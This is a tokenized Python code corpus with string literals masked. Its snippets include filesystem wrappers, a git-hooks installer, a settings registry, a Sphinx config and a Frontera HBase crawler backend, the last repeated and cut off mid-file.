get_text ( ) == l [ '<STR_LIT:s>' ] and child . get_position ( ) == ( l [ '<STR_LIT:x>' ] , l [ '<STR_LIT:y>' ] ) : <EOL> have_label = True <EOL> break <EOL> except AttributeError : <EOL> pass <EOL> if not have_label : <EOL> target . text ( ** l ) </s>
<s> from bitfinex . client import Client , TradeClient </s>
<s> import glob <EOL> import os <EOL> class RealFilesystem ( object ) : <EOL> def create_directories ( self , path ) : <EOL> return os . makedirs ( path ) <EOL> def path_exists ( self , path ) : <EOL> return os . path . exists ( path ) <EOL> def is_directory ( self , path ) : <EOL> return os . path . isdir ( path ) <EOL> def is_file ( self , path ) : <EOL> return os . path . isfile ( path ) <EOL> def is_writable ( self , path ) : <EOL> return os . access ( path , os . W_OK ) <EOL> def _paths_in_directory ( self , directory , incl_subdirs = False ) : <EOL> assert self . is_directory ( directory ) <EOL> pattern = os . path . join ( directory , "<STR_LIT:*>" ) <EOL> result = glob . glob ( pattern ) <EOL> subdir_pattern = os . path . join ( directory , "<STR_LIT:*>" , "<STR_LIT:*>" ) <EOL> subdir_result = glob . glob ( subdir_pattern ) if incl_subdirs else [ ] <EOL> return result + subdir_result <EOL> def files_in_directory ( self , directory , include_subdirectories = False ) : <EOL> assert self . is_directory ( directory ) , "<STR_LIT>" <EOL> return filter ( <EOL> os . path . isfile , <EOL> self . _paths_in_directory ( directory , incl_subdirs = include_subdirectories ) , <EOL> ) <EOL> def subdirectories_of_directory ( self , directory , recursive = False ) : <EOL> assert self . is_directory ( directory ) , "<STR_LIT>" <EOL> return filter ( <EOL> os . path . isdir , <EOL> self . _paths_in_directory ( directory , incl_subdirs = recursive ) , <EOL> ) <EOL> class FakeFilesystem ( object ) : <EOL> def __init__ ( self , root ) : <EOL> self . root = root <EOL> self . fs = RealFilesystem ( ) <EOL> def adjusted_path ( self , path ) : <EOL> """<STR_LIT>""" <EOL> if os . path . realpath ( path ) . startswith ( os . path . realpath ( self . root ) ) : <EOL> return path <EOL> to_components = lambda p : os . path . normpath ( p ) . split ( os . sep ) <EOL> root_components = to_components ( self . root ) <EOL> path_components = to_components ( path ) <EOL> if os . path . isabs ( path ) : <EOL> path_components . pop ( <NUM_LIT:0> ) <EOL> return os . sep . join ( root_components + path_components ) <EOL> def create_directories ( self , path ) : <EOL> return self . fs . create_directories ( self . adjusted_path ( path ) ) <EOL> def path_exists ( self , path ) : <EOL> return self . fs . path_exists ( self . adjusted_path ( path ) ) <EOL> def is_directory ( self , path ) : <EOL> return self . fs . is_directory ( self . adjusted_path ( path ) ) <EOL> def is_file ( self , path ) : <EOL> return self . fs . is_file ( self . adjusted_path ( path ) ) <EOL> def is_writable ( self , path ) : <EOL> return self . fs . is_writable ( self . adjusted_path ( path ) ) <EOL> def files_in_directory ( self , directory , include_subdirectories = False ) : <EOL> return self . fs . files_in_directory ( <EOL> self . adjusted_path ( directory ) , <EOL> include_subdirectories = include_subdirectories <EOL> ) <EOL> def subdirectories_of_directory ( self , directory , recursive = False ) : <EOL> return self . fs . files_in_directory ( <EOL> self . adjusted_path ( directory ) , <EOL> recursive = recursive <EOL> ) </s>
<s> import webbrowser <EOL> from ice . logs import logger <EOL> class LaunchSteamTask ( object ) : <EOL> def __call__ ( self , app_settings , users , dry_run ) : <EOL> webbrowser . open_new ( "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> import glob <EOL> import os <EOL> import platform <EOL> import shutil <EOL> import subprocess <EOL> import sys <EOL> from subprocess import call <EOL> WINDOWS_VERSION_NEEDS_TESTING_ERROR_MESSAGE = """<STR_LIT>""" <EOL> GIT_HOOKS_ALREADY_EXIST_ERROR_MESSAGE = """<STR_LIT>""" <EOL> class WindowsSymlinkAdapter ( object ) : <EOL> def __init__ ( self ) : <EOL> print WINDOWS_VERSION_NEEDS_TESTING_ERROR_MESSAGE <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> import win32file <EOL> self . win32file = win32file <EOL> def exists_at_path ( self , path ) : <EOL> pass <EOL> def create ( self , name , target ) : <EOL> self . win32file . CreateSymbolicLink ( fileSrc , fileTarget , <NUM_LIT:1> ) <EOL> class UnixSymlinkAdapter ( object ) : <EOL> def exists_at_path ( self , path ) : <EOL> return os . path . islink ( path ) <EOL> def create ( self , name , target ) : <EOL> os . symlink ( target , name ) <EOL> def find_path_to_git_root ( ) : <EOL> return subprocess . check_output ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) . strip ( ) <EOL> def remove_preexisting_hooks_dir ( hooks_directory ) : <EOL> """<STR_LIT>""" <EOL> if not os . path . exists ( hooks_directory ) : <EOL> return False <EOL> hooks = os . listdir ( hooks_directory ) <EOL> if len ( hooks ) == <NUM_LIT:0> : <EOL> print "<STR_LIT>" <EOL> shutil . rmtree ( hooks_directory ) <EOL> return False <EOL> samples = glob . glob ( os . path . join ( hooks_directory , "<STR_LIT>" ) ) <EOL> if len ( hooks ) == len ( samples ) : <EOL> print "<STR_LIT>" <EOL> shutil . rmtree ( hooks_directory ) <EOL> return False <EOL> return True <EOL> def create_hooks_symlink ( adapter , target_hooks_path ) : <EOL> """<STR_LIT>""" <EOL> root_relative_path = find_path_to_git_root ( ) <EOL> target_hooks_path = os . path . abspath ( os . path . join ( root_relative_path , target_hooks_path ) ) <EOL> install_path = os . path . abspath ( os . path . join ( root_relative_path , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> if adapter . exists_at_path ( install_path ) : <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> print "<STR_LIT>" % install_path <EOL> if remove_preexisting_hooks_dir ( install_path ) : <EOL> print GIT_HOOKS_ALREADY_EXIST_ERROR_MESSAGE <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> adapter . create ( install_path , target_hooks_path ) <EOL> def main ( ) : <EOL> adapter = WindowsSymlinkAdapter ( ) if platform . system ( ) == '<STR_LIT>' else UnixSymlinkAdapter ( ) <EOL> create_hooks_symlink ( adapter , os . path . join ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> import hashlib <EOL> from pkgutil import get_data <EOL> from functools import wraps <EOL> import six <EOL> from yaml import load as load_yaml <EOL> from . utils import registry <EOL> @ registry <EOL> class Settings ( object ) : <EOL> """<STR_LIT>""" <EOL> _default = True <EOL> _yaml_data = None <EOL> def __init__ ( self , settings = None ) : <EOL> if settings : <EOL> self . _updateall ( settings . items ( ) ) <EOL> else : <EOL> self . _updateall ( self . _get_settings_from_yaml ( ) . items ( ) ) <EOL> @ classmethod <EOL> def get_key ( cls , settings = None ) : <EOL> if not settings : <EOL> return '<STR_LIT:default>' <EOL> keys = sorted ( [ '<STR_LIT>' % ( key , str ( settings [ key ] ) ) for key in settings ] ) <EOL> return hashlib . md5 ( '<STR_LIT>' . join ( keys ) . encode ( '<STR_LIT:utf-8>' ) ) . hexdigest ( ) <EOL> @ classmethod <EOL> def _get_settings_from_yaml ( cls ) : <EOL> if not cls . _yaml_data : <EOL> data = get_data ( '<STR_LIT:data>' , '<STR_LIT>' ) <EOL> cls . _yaml_data = load_yaml ( data ) . pop ( '<STR_LIT>' , { } ) <EOL> return cls . _yaml_data <EOL> def _updateall ( self , iterable ) : <EOL> for key , value in iterable : <EOL> setattr ( self , key , value ) <EOL> def replace ( self , ** kwds ) : <EOL> for x in six . iterkeys ( self . _get_settings_from_yaml ( ) ) : <EOL> kwds . setdefault ( x , getattr ( self , x ) ) <EOL> kwds [ '<STR_LIT>' ] = False <EOL> return self . __class__ ( settings = kwds ) <EOL> settings = Settings ( ) <EOL> def apply_settings ( f ) : <EOL> @ wraps ( f ) <EOL> def wrapper ( * args , ** kwargs ) : <EOL> kwargs [ '<STR_LIT>' ] = kwargs . get ( '<STR_LIT>' , settings ) <EOL> if kwargs [ '<STR_LIT>' ] is None : <EOL> kwargs [ '<STR_LIT>' ] = settings <EOL> if isinstance ( kwargs [ '<STR_LIT>' ] , dict ) : <EOL> kwargs [ '<STR_LIT>' ] = settings . replace ( ** kwargs [ '<STR_LIT>' ] ) <EOL> if not isinstance ( kwargs [ '<STR_LIT>' ] , Settings ) : <EOL> raise TypeError ( <EOL> "<STR_LIT>" ) <EOL> return f ( * args , ** kwargs ) <EOL> return wrapper </s>
<s> from struct import pack , unpack <EOL> from datetime import datetime <EOL> from calendar import timegm <EOL> from time import time <EOL> from binascii import hexlify , unhexlify <EOL> from zlib import crc32 <EOL> from io import BytesIO <EOL> from random import choice <EOL> from happybase import Connection <EOL> from frontera . utils . url import parse_domain_from_url_fast <EOL> from msgpack import Unpacker , Packer <EOL> from frontera import DistributedBackend <EOL> from frontera . core . components import Metadata , Queue , States <EOL> from frontera . core . models import Request <EOL> from distributed_frontera . worker . partitioner import Crc32NamePartitioner <EOL> from distributed_frontera . worker . utils import chunks <EOL> _pack_functions = { <EOL> '<STR_LIT:url>' : str , <EOL> '<STR_LIT>' : lambda x : pack ( '<STR_LIT>' , <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : lambda x : pack ( '<STR_LIT>' , x ) , <EOL> '<STR_LIT>' : lambda x : pack ( '<STR_LIT>' , x ) , <EOL> '<STR_LIT:state>' : lambda x : pack ( '<STR_LIT>' , x ) , <EOL> '<STR_LIT:error>' : str , <EOL> '<STR_LIT>' : str , <EOL> '<STR_LIT>' : lambda x : pack ( '<STR_LIT>' , x ) , <EOL> '<STR_LIT:content>' : str <EOL> } <EOL> def unpack_score ( blob ) : <EOL> return unpack ( "<STR_LIT>" , blob ) [ <NUM_LIT:0> ] <EOL> def prepare_hbase_object ( obj = None , ** kwargs ) : <EOL> if not obj : <EOL> obj = dict ( ) <EOL> for k , v in kwargs . iteritems ( ) : <EOL> if k in [ '<STR_LIT>' , '<STR_LIT:state>' ] : <EOL> cf = '<STR_LIT:s>' <EOL> elif k == '<STR_LIT:content>' : <EOL> cf = '<STR_LIT:c>' <EOL> else : <EOL> cf = '<STR_LIT:m>' <EOL> func = _pack_functions [ k ] <EOL> obj [ cf + '<STR_LIT::>' + k ] = func ( v ) <EOL> return obj <EOL> def utcnow_timestamp ( ) : <EOL> d = datetime . utcnow ( ) <EOL> return timegm ( d . timetuple ( ) ) <EOL> class HBaseQueue ( Queue ) : <EOL> GET_RETRIES = <NUM_LIT:3> <EOL> def __init__ ( self , connection , partitions , logger , table_name , drop = False ) : <EOL> self . connection = connection <EOL> self . partitions = [ i for i in range ( <NUM_LIT:0> , partitions ) ] <EOL> self . partitioner = Crc32NamePartitioner ( self . partitions ) <EOL> self . logger = logger <EOL> self . table_name = table_name <EOL> tables = set ( self . connection . tables ( ) ) <EOL> if drop and self . table_name in tables : <EOL> self . connection . delete_table ( self . table_name , disable = True ) <EOL> tables . remove ( self . table_name ) <EOL> if self . table_name not in tables : <EOL> self . connection . create_table ( self . table_name , { '<STR_LIT:f>' : { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> } } ) <EOL> def frontier_start ( self ) : <EOL> pass <EOL> def frontier_stop ( self ) : <EOL> pass <EOL> def schedule ( self , batch ) : <EOL> to_schedule = [ ] <EOL> for fprint , score , request , schedule in batch : <EOL> if schedule : <EOL> if '<STR_LIT>' not in request . meta : <EOL> _ , hostname , _ , _ , _ , _ = parse_domain_from_url_fast ( request . url ) <EOL> if not hostname : <EOL> self . logger . error ( "<STR_LIT>" % ( request . url , fprint ) ) <EOL> request . meta [ '<STR_LIT>' ] = { '<STR_LIT:name>' : hostname } <EOL> to_schedule . append ( ( score , fprint , request . meta [ '<STR_LIT>' ] , request . url ) ) <EOL> self . _schedule ( to_schedule ) <EOL> def _schedule ( self , batch ) : <EOL> """<STR_LIT>""" <EOL> def get_crc32 ( name ) : <EOL> return crc32 ( name ) if type ( name ) is str else crc32 ( name . encode ( '<STR_LIT:utf-8>' , '<STR_LIT:ignore>' ) ) <EOL> def get_interval ( score , resolution ) : <EOL> if score < <NUM_LIT:0.0> or score > <NUM_LIT:1.0> : <EOL> raise OverflowError <EOL> i = int ( score / resolution ) <EOL> if i % <NUM_LIT:10> == <NUM_LIT:0> and i > <NUM_LIT:0> : <EOL> i = i - <NUM_LIT:1> <EOL> return ( i * resolution , ( i + <NUM_LIT:1> ) * resolution ) <EOL> timestamp = int ( time ( ) * <NUM_LIT> ) <EOL> data = dict ( ) <EOL> for score , fingerprint , domain , url in batch : <EOL> if type ( domain ) == dict : <EOL> partition_id = self . partitioner . partition ( domain [ '<STR_LIT:name>' ] , self . partitions ) <EOL> host_crc32 = get_crc32 ( domain [ '<STR_LIT:name>' ] ) <EOL> elif type ( domain ) == int : <EOL> partition_id = self . partitioner . partition_by_hash ( domain , self . partitions ) <EOL> host_crc32 = domain <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> item = ( unhexlify ( fingerprint ) , host_crc32 , url , score ) <EOL> score = <NUM_LIT:1> - score <EOL> rk = "<STR_LIT>" % ( partition_id , "<STR_LIT>" % get_interval ( score , <NUM_LIT> ) , timestamp ) <EOL> data . setdefault ( rk , [ ] ) . append ( ( score , item ) ) <EOL> table = self . connection . table ( self . table_name ) <EOL> with table . batch ( transaction = True ) as b : <EOL> for rk , tuples in data . iteritems ( ) : <EOL> obj = dict ( ) <EOL> for score , item in tuples : <EOL> column = '<STR_LIT>' % get_interval ( score , <NUM_LIT> ) <EOL> obj . setdefault ( column , [ ] ) . append ( item ) <EOL> final = dict ( ) <EOL> packer = Packer ( ) <EOL> for column , items in obj . iteritems ( ) : <EOL> stream = BytesIO ( ) <EOL> for item in items : <EOL> stream . write ( packer . pack ( item ) ) <EOL> final [ column ] = stream . getvalue ( ) <EOL> b . put ( rk , final ) <EOL> def get_next_requests ( self , max_n_requests , partition_id , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> min_requests = kwargs . pop ( '<STR_LIT>' ) <EOL> min_hosts = kwargs . pop ( '<STR_LIT>' ) <EOL> max_requests_per_host = kwargs . pop ( '<STR_LIT>' ) <EOL> assert ( max_n_requests > min_requests ) <EOL> table = self . connection . table ( self . table_name ) <EOL> meta_map = { } <EOL> queue = { } <EOL> limit = min_requests <EOL> tries = <NUM_LIT:0> <EOL> count = <NUM_LIT:0> <EOL> while tries < self . GET_RETRIES : <EOL> tries += <NUM_LIT:1> <EOL> limit *= <NUM_LIT> if tries > <NUM_LIT:1> else <NUM_LIT:1.0> <EOL> self . logger . debug ( "<STR_LIT>" % ( tries , limit , count , len ( queue . keys ( ) ) ) ) <EOL> meta_map . clear ( ) <EOL> queue . clear ( ) <EOL> count = <NUM_LIT:0> <EOL> for rk , data in table . scan ( row_prefix = '<STR_LIT>' % partition_id , limit = int ( limit ) , batch_size = <NUM_LIT> ) : <EOL> for cq , buf in data . iteritems ( ) : <EOL> stream = BytesIO ( buf ) <EOL> unpacker = Unpacker ( stream ) <EOL> for item in unpacker : <EOL> fingerprint , host_crc32 , url , score = item <EOL> if host_crc32 not in queue : <EOL> queue [ host_crc32 ] = [ ] <EOL> if max_requests_per_host is not None and len ( queue [ host_crc32 ] ) > max_requests_per_host : <EOL> continue <EOL> queue [ host_crc32 ] . append ( fingerprint ) <EOL> count += <NUM_LIT:1> <EOL> if fingerprint not in meta_map : <EOL> meta_map [ fingerprint ] = [ ] <EOL> meta_map [ fingerprint ] . append ( ( rk , item ) ) <EOL> if count > max_n_requests : <EOL> break <EOL> if min_hosts is not None and len ( queue . keys ( ) ) < min_hosts : <EOL> continue <EOL> if count < min_requests : <EOL> continue <EOL> break <EOL> self . logger . debug ( "<STR_LIT>" % ( tries , len ( queue . keys ( ) ) , count ) ) <EOL> fprint_map = { } <EOL> for fprint , meta_list in meta_map . iteritems ( ) : <EOL> for rk , _ in meta_list : <EOL> fprint_map . setdefault ( rk , [ ] ) . append ( fprint ) <EOL> results = [ ] <EOL> trash_can = set ( ) <EOL> for _ , fprints in queue . iteritems ( ) : <EOL> for fprint in fprints : <EOL> for rk , _ in meta_map [ fprint ] : <EOL> trash_can . add ( rk ) <EOL> for rk_fprint in fprint_map [ rk ] : <EOL> _ , item = meta_map [ rk_fprint ] [ <NUM_LIT:0> ] <EOL> _ , _ , url , score = item <EOL> results . append ( Request ( url , meta = { <EOL> '<STR_LIT>' : hexlify ( rk_fprint ) , <EOL> '<STR_LIT>' : score , <EOL> } ) ) <EOL> with table . batch ( transaction = True ) as b : <EOL> for rk in trash_can : <EOL> b . delete ( rk ) <EOL> self . logger . debug ( "<STR_LIT>" % ( len ( trash_can ) ) ) <EOL> return results <EOL> def count ( self ) : <EOL> return NotImplementedError <EOL> class HBaseState ( States ) : <EOL> def __init__ ( self , connection , table_name , logger , cache_size_limit ) : <EOL> self . connection = connection <EOL> self . _table_name = table_name <EOL> self . logger = logger <EOL> self . _state_cache = { } <EOL> self . _cache_size_limit = cache_size_limit <EOL> def update_cache ( self , objs ) : <EOL> objs = objs if type ( objs ) in [ list , tuple ] else [ objs ] <EOL> def put ( obj ) : <EOL> if obj . meta [ '<STR_LIT:state>' ] is not None : <EOL> self . _state_cache [ obj . meta [ '<STR_LIT>' ] ] = obj . meta [ '<STR_LIT:state>' ] <EOL> map ( put , objs ) <EOL> def set_states ( self , objs ) : <EOL> objs = objs if type ( objs ) in [ list , tuple ] else [ objs ] <EOL> def get ( obj ) : <EOL> fprint = obj . meta [ '<STR_LIT>' ] <EOL> obj . meta [ '<STR_LIT:state>' ] = self . _state_cache [ fprint ] if fprint in self . _state_cache else None <EOL> map ( get , objs ) <EOL> def flush ( self , force_clear ) : <EOL> if len ( self . _state_cache ) > self . _cache_size_limit : <EOL> force_clear = True <EOL> table = self . connection . table ( self . _table_name ) <EOL> for chunk in chunks ( self . _state_cache . items ( ) , <NUM_LIT> ) : <EOL> with table . batch ( transaction = True ) as b : <EOL> for fprint , state in chunk : <EOL> hb_obj = prepare_hbase_object ( state = state ) <EOL> b . put ( unhexlify ( fprint ) , hb_obj ) <EOL> if force_clear : <EOL> self . logger . debug ( "<STR_LIT>" % len ( self . _state_cache ) ) <EOL> self . _state_cache . clear ( ) <EOL> def fetch ( self , fingerprints ) : <EOL> to_fetch = [ f for f in fingerprints if f not in self . _state_cache ] <EOL> self . logger . debug ( "<STR_LIT>" % len ( self . _state_cache ) ) <EOL> self . logger . debug ( "<STR_LIT>" % ( len ( to_fetch ) , len ( fingerprints ) ) ) <EOL> for chunk in chunks ( to_fetch , <NUM_LIT> ) : <EOL> keys = [ unhexlify ( fprint ) for fprint in chunk ] <EOL> table = self . connection . table ( self . _table_name ) <EOL> records = table . rows ( keys , columns = [ '<STR_LIT>' ] ) <EOL> for key , cells in records : <EOL> if '<STR_LIT>' in cells : <EOL> state = unpack ( '<STR_LIT>' , cells [ '<STR_LIT>' ] ) [ <NUM_LIT:0> ] <EOL> self . _state_cache [ hexlify ( key ) ] = state <EOL> class HBaseMetadata ( Metadata ) : <EOL> def __init__ ( self , connection , table_name , drop_all_tables , use_snappy , batch_size , store_content ) : <EOL> self . _table_name = table_name <EOL> tables = set ( connection . tables ( ) ) <EOL> if drop_all_tables and self . _table_name in tables : <EOL> connection . delete_table ( self . _table_name , disable = True ) <EOL> tables . remove ( self . _table_name ) <EOL> if self . _table_name not in tables : <EOL> schema = { '<STR_LIT:m>' : { '<STR_LIT>' : <NUM_LIT:1> } , <EOL> '<STR_LIT:s>' : { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : True , } , <EOL> '<STR_LIT:c>' : { '<STR_LIT>' : <NUM_LIT:1> } <EOL> } <EOL> if use_snappy : <EOL> schema [ '<STR_LIT:m>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> schema [ '<STR_LIT:c>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> connection . create_table ( self . _table_name , schema ) <EOL> table = connection . table ( self . _table_name ) <EOL> self . batch = table . batch ( batch_size = batch_size ) <EOL> self . store_content = store_content <EOL> def frontier_start ( self ) : <EOL> pass <EOL> def frontier_stop ( self ) : <EOL> self . flush ( ) <EOL> def flush ( self ) : <EOL> self . batch . send ( ) <EOL> def add_seeds ( self , seeds ) : <EOL> for seed in seeds : <EOL> obj = prepare_hbase_object ( url = seed . url , <EOL> depth = <NUM_LIT:0> , <EOL> created_at = utcnow_timestamp ( ) , <EOL> domain_fingerprint = seed . meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> self . batch . put ( unhexlify ( seed . meta [ '<STR_LIT>' ] ) , obj ) <EOL> def page_crawled ( self , response , links ) : <EOL> obj = prepare_hbase_object ( status_code = response . status_code , content = response . body ) if self . store_content else prepare_hbase_object ( status_code = response . status_code ) <EOL> links_dict = dict ( ) <EOL> for link in links : <EOL> links_dict [ unhexlify ( link . meta [ '<STR_LIT>' ] ) ] = ( link , link . url , link . meta [ '<STR_LIT>' ] ) <EOL> self . batch . put ( unhexlify ( response . meta [ '<STR_LIT>' ] ) , obj ) <EOL> for link_fingerprint , ( link , link_url , link_domain ) in links_dict . iteritems ( ) : <EOL> obj = prepare_hbase_object ( url = link_url , <EOL> created_at = utcnow_timestamp ( ) , <EOL> domain_fingerprint = link_domain [ '<STR_LIT>' ] ) <EOL> self . batch . put ( link_fingerprint , obj ) <EOL> def request_error ( self , request , error ) : <EOL> obj = prepare_hbase_object ( url = request . url , <EOL> created_at = utcnow_timestamp ( ) , <EOL> error = error , <EOL> domain_fingerprint = request . meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> rk = unhexlify ( request . meta [ '<STR_LIT>' ] ) <EOL> self . batch . put ( rk , obj ) <EOL> def update_score ( self , batch ) : <EOL> if not isinstance ( batch , dict ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> for fprint , ( score , url , schedule ) in batch . iteritems ( ) : <EOL> obj = prepare_hbase_object ( score = score ) <EOL> rk = unhexlify ( fprint ) <EOL> self . batch . put ( rk , obj ) <EOL> class HBaseBackend ( DistributedBackend ) : <EOL> component_name = '<STR_LIT>' <EOL> def __init__ ( self , manager ) : <EOL> self . manager = manager <EOL> self . logger = manager . logger . backend <EOL> settings = manager . settings <EOL> port = settings . get ( '<STR_LIT>' ) <EOL> hosts = settings . get ( '<STR_LIT>' ) <EOL> namespace = settings . get ( '<STR_LIT>' ) <EOL> self . queue_partitions = settings . get ( '<STR_LIT>' ) <EOL> host = choice ( hosts ) if type ( hosts ) in [ list , tuple ] else hosts <EOL> kwargs = { <EOL> '<STR_LIT:host>' : host , <EOL> '<STR_LIT:port>' : int ( port ) , <EOL> '<STR_LIT>' : namespace , <EOL> '<STR_LIT>' : '<STR_LIT::>' <EOL> } <EOL> if settings . get ( '<STR_LIT>' ) : <EOL> kwargs . update ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) <EOL> self . connection = Connection ( ** kwargs ) <EOL> self . _metadata = None <EOL> self . _queue = None <EOL> self . _states = None <EOL> @ classmethod <EOL> def strategy_worker ( cls , manager ) : <EOL> o = cls ( manager ) <EOL> settings = manager . settings <EOL> o . _states = HBaseState ( o . connection , settings . get ( '<STR_LIT>' ) , o . manager . logger . backend , <EOL> settings . get ( '<STR_LIT>' ) ) <EOL> return o <EOL> @ classmethod <EOL> def db_worker ( cls , manager ) : <EOL> o = cls ( manager ) <EOL> settings = manager . settings <EOL> drop_all_tables = settings . get ( '<STR_LIT>' ) <EOL> o . _queue = HBaseQueue ( o . connection , o . queue_partitions , o . manager . logger . backend , <EOL> settings . get ( '<STR_LIT>' ) , drop = drop_all_tables ) <EOL> o . _metadata = HBaseMetadata ( o . connection , settings . get ( '<STR_LIT>' ) , drop_all_tables , <EOL> settings . get ( '<STR_LIT>' ) , settings . get ( '<STR_LIT>' ) , <EOL> settings . get ( '<STR_LIT>' ) ) <EOL> return o <EOL> @ property <EOL> def metadata ( self ) : <EOL> return self . _metadata <EOL> @ property <EOL> def queue ( self ) : <EOL> return self . _queue <EOL> @ property <EOL> def states ( self ) : <EOL> return self . _states <EOL> def frontier_start ( self ) : <EOL> for component in [ self . metadata , self . queue , self . states ] : <EOL> if component : <EOL> component . frontier_start ( ) <EOL> def frontier_stop ( self ) : <EOL> for component in [ self . metadata , self . queue , self . states ] : <EOL> if component : <EOL> component . frontier_stop ( ) <EOL> self . connection . close ( ) <EOL> def add_seeds ( self , seeds ) : <EOL> self . metadata . add_seeds ( seeds ) <EOL> def page_crawled ( self , response , links ) : <EOL> self . metadata . page_crawled ( response , links ) <EOL> def request_error ( self , page , error ) : <EOL> self . metadata . request_error ( page , error ) <EOL> def finished ( self ) : <EOL> raise NotImplementedError <EOL> def get_next_requests ( self , max_next_requests , ** kwargs ) : <EOL> next_pages = [ ] <EOL> self . logger . debug ( "<STR_LIT>" ) <EOL> partitions = set ( kwargs . pop ( '<STR_LIT>' , [ ] ) ) <EOL> for partition_id in range ( <NUM_LIT:0> , self . queue_partitions ) : <EOL> if partition_id not in partitions : <EOL> continue <EOL> results = self . queue . get_next_requests ( max_next_requests , partition_id , min_requests = <NUM_LIT:64> , <EOL> min_hosts = <NUM_LIT> , max_requests_per_host = <NUM_LIT> ) <EOL> next_pages . extend ( results ) <EOL> self . logger . debug ( "<STR_LIT>" % ( len ( results ) , partition_id ) ) <EOL> return next_pages </s>
<s> import sys <EOL> from os import path <EOL> dir = path . dirname ( __file__ ) <EOL> sys . path . extend ( [ path . join ( dir , "<STR_LIT>" ) , path . join ( dir , "<STR_LIT>" ) ] ) <EOL> extensions = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = '<STR_LIT>' <EOL> release = '<STR_LIT>' <EOL> exclude_patterns = [ ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT:default>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] <EOL> import os <EOL> on_rtd = os . environ . get ( '<STR_LIT>' , None ) == '<STR_LIT:True>' <EOL> if on_rtd : <EOL> html_theme = '<STR_LIT:default>' <EOL> else : <EOL> import sphinx_rtd_theme <EOL> html_theme = "<STR_LIT>" <EOL> html_theme_path = [ sphinx_rtd_theme . get_html_theme_path ( ) ] <EOL> autoclass_content = '<STR_LIT>' </s>
<s> from struct import pack , unpack <EOL> from datetime import datetime <EOL> from calendar import timegm <EOL> from time import time <EOL> from binascii import hexlify , unhexlify <EOL> from zlib import crc32 <EOL> from io import BytesIO <EOL> from random import choice <EOL> from happybase import Connection <EOL> from frontera . utils . url import parse_domain_from_url_fast <EOL> from msgpack import Unpacker , Packer <EOL> from frontera import DistributedBackend <EOL> from frontera . core . components import Metadata , Queue , States <EOL> from frontera . core . models import Request <EOL> from frontera . contrib . backends . partitioners import Crc32NamePartitioner <EOL> from frontera . utils . misc import chunks <EOL> _pack_functions = { <EOL> '<STR_LIT:url>' : str , <EOL> '<STR_LIT>' : lambda x : pack ( '<STR_LIT>' , <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : lambda x : pack ( '<STR_LIT>' , x ) , <EOL> '<STR_LIT>' : lambda x : pack ( '<STR_LIT>' , x ) , <EOL> '<STR_LIT:state>' : lambda x : pack ( '<STR_LIT>' , x ) , <EOL> '<STR_LIT:error>' : str , <EOL> '<STR_LIT>' : str , <EOL> '<STR_LIT>' : lambda x : pack ( '<STR_LIT>' , x ) , <EOL> '<STR_LIT:content>' : str <EOL> } <EOL> def unpack_score ( blob ) : <EOL> return unpack ( "<STR_LIT>" , blob ) [ <NUM_LIT:0> ] <EOL> def prepare_hbase_object ( obj = None , ** kwargs ) : <EOL> if not obj : <EOL> obj = dict ( ) <EOL> for k , v in kwargs . iteritems ( ) : <EOL> if k in [ '<STR_LIT>' , '<STR_LIT:state>' ] : <EOL> cf = '<STR_LIT:s>' <EOL> elif k == '<STR_LIT:content>' : <EOL> cf = '<STR_LIT:c>' <EOL> else : <EOL> cf = '<STR_LIT:m>' <EOL> func = _pack_functions [ k ] <EOL> obj [ cf + '<STR_LIT::>' + k ] = func ( v ) <EOL> return obj <EOL> def utcnow_timestamp ( ) : <EOL> d = datetime . utcnow ( ) <EOL> return timegm ( d . timetuple ( ) ) <EOL> class HBaseQueue ( Queue ) : <EOL> GET_RETRIES = <NUM_LIT:3> <EOL> def __init__ ( self , connection , partitions , logger , table_name , drop = False ) : <EOL> self . connection = connection <EOL> self . partitions = [ i for i in range ( <NUM_LIT:0> , partitions ) ] <EOL> self . partitioner = Crc32NamePartitioner ( self . partitions ) <EOL> self . logger = logger <EOL> self . table_name = table_name <EOL> tables = set ( self . connection . tables ( ) ) <EOL> if drop and self . table_name in tables : <EOL> self . connection . delete_table ( self . table_name , disable = True ) <EOL> tables . remove ( self . table_name ) <EOL> if self . table_name not in tables : <EOL> self . connection . create_table ( self . table_name , { 